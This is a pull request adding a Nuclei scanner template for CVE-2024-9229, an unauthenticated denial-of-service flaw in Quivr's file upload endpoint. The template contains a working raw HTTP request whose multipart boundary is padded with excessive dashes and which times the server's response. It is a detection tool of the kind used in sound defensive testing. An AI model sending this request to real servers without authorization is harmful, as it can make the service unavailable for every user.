### PR TITLE
Add CVE-2024-9229 - Quivr DoS via multipart boundary

### DIFF
--- a/http/cves/2024/CVE-2024-9229.yaml
+++ b/http/cves/2024/CVE-2024-9229.yaml
@@ -1,0 +1,69 @@
+id: CVE-2024-9229
+
+info:
+  name: Quivr <=v0.0.298 - Unauthenticated DoS via Multipart Boundary
+  author: YunSeoJo
+  severity: high
+  description: |
+    Quivr v0.0.298 and prior are vulnerable to unauthenticated Denial of Service
+    via the file upload endpoint. Appending excessive characters to the multipart
+    boundary causes the server to process each character continuously, leading to
+    resource exhaustion and service unavailability.
+  impact: |
+    An unauthenticated attacker can render the entire Quivr service unavailable
+    by sending a single crafted HTTP request. Although the UI may remain visible,
+    all server-side functionality becomes inoperable for all users.
+  remediation: |
+    Upgrade Quivr to a version later than v0.0.298 where input validation on
+    multipart boundaries has been implemented.
+  reference:
+    - https://huntr.com/bounties/946a412d-422f-4623-bb1d-d2646ad23dfd
+    - https://github.com/stangirard/quivr
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-9229
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
+    cvss-score: 7.5
+    cve-id: CVE-2024-9229
+    cwe-id: CWE-770
+  metadata:
+    verified: false
+    max-request: 2
+    vendor: quivr
+    product: quivr
+  tags: cve,cve2024,quivr,dos,unauth,fileupload
+
+flow: http(1) && http(2)
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/login"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains_any(body, "<title>Quivr - Get a Second Brain", "data-sentry-component=\"QuivrLogo\"")'
+          - 'status_code == 200'
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        @timeout: 30s
+        POST /upload HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=---------------------------284178091740602105783377960069
+
+        -----------------------------284178091740602105783377960069
+        Content-Disposition: form-data; name="uploadFile"; filename="test.txt"
+        Content-Type: text/plain
+
+        nuclei-test
+        -----------------------------284178091740602105783377960069----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration >= 10'
+          - 'status_code == 200 || status_code == 422 || status_code == 500'
+        condition: and


### PR DESCRIPTION
### PR Information

- Added CVE-2024-9229
- References:
  - https://huntr.com/bounties/946a412d-422f-4623-bb1d-d2646ad23dfd
  - https://nvd.nist.gov/vuln/detail/CVE-2024-9229

### Template validation

- [ ] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [ ] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details (leave it blank if not applicable)

Template uses two-step detection:
1. Fingerprints Quivr via `/login` page content
2. Sends malformed multipart boundary (excessive `-` characters) to `/upload` and checks for response delay (`duration >= 10`)

Note: Could not validate against actual Quivr v0.0.298 instance as a public Docker image is not available. Submitted as `verified: false`.

### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
